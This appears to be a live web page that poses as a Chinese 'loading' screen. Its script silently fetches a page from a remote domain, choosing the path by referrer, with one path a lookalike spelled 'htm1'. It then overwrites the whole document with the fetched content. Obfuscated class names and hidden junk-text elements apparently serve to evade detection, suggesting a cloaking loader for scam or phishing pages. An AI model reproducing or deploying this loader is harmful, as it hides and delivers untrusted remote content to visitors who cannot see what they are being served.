<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .gVzjuiVL {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .gVzjuiVL .D7fwVk0nz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .gVzjuiVL .content {
            line-height: 50px;
            text-align: center
        }

        .gVzjuiVL .img {
            width: 100%
        }

        .gVzjuiVL .es7VAMX9P9 {
            text-align: center
        }

        .gVzjuiVL .es7VAMX9P9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .gVzjuiVL .es7VAMX9P9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .gVzjuiVL .es7VAMX9P9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .gVzjuiVL .es7VAMX9P9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .gVzjuiVL .es7VAMX9P9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .gVzjuiVL .es7VAMX9P9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .gVzjuiVL .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iC9DE1HXb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QHIGJt4 = iC9DE1HXb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QHIGJt4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QHIGJt4 +".html?a=share";
		}
		
        hIhVeEr=url+"#"+new Date().getTime();
        hIhVeEr && function() {
            $.get(hIhVeEr, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >OseGkVbItquZh2Mdx2Ja9</li>
<b style='display:none' >hN3SolebLnVEusA2zgsrFUpWZAsBI30ADs5gXJPImxRZV6S</b>
<span style='display:none'>eMhOgVkHnYZ28qIQLfPadLENZz1KhgsVgrA7xq8rf6aR3nzsdEMHIzq72N0LcdcfI52s8z1AysvoYCceJWWQdSiUM4antbea</span>
<p  style='display:none'>ocALzhCuOfNVLhmV66WeAnOPRRLUxeryChmw</p><div class="gVzjuiVL">
    <div class="D7fwVk0nz">
        <div class="es7VAMX9P9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>Cwr8LlTKjFSymRTrvQVgJp1gHC1hYUMPtOBesNoWKjnEBfm0T3V4dAdkHgDY5Yxe6uOMupn4JdxD0OaWImjxdg7DwWSSzty</span>
<a  href='#' style='display:none'>frmSNzQCu1I1qg2PyoRCJyCQhu</a>
<li style='display:none' >AaFByBe5R9gh1clVSi1CnzopDvqMWzxheEMgXLhiGVcSuxQABBmNt38orv5qXM08u6zdCGB1RyBUKwPPsXjjTstsjWSedsXLFl</li>
<h1 style='display:none' >rclWN7LjV3Vu63sJTOCjdNakX9ksjofcMAkWn6tKQMCyRbOScyfe7McPb7VNKd6JHjgD2ycbp6pgxWFDNZXSifD1BH</h1></body>
</html>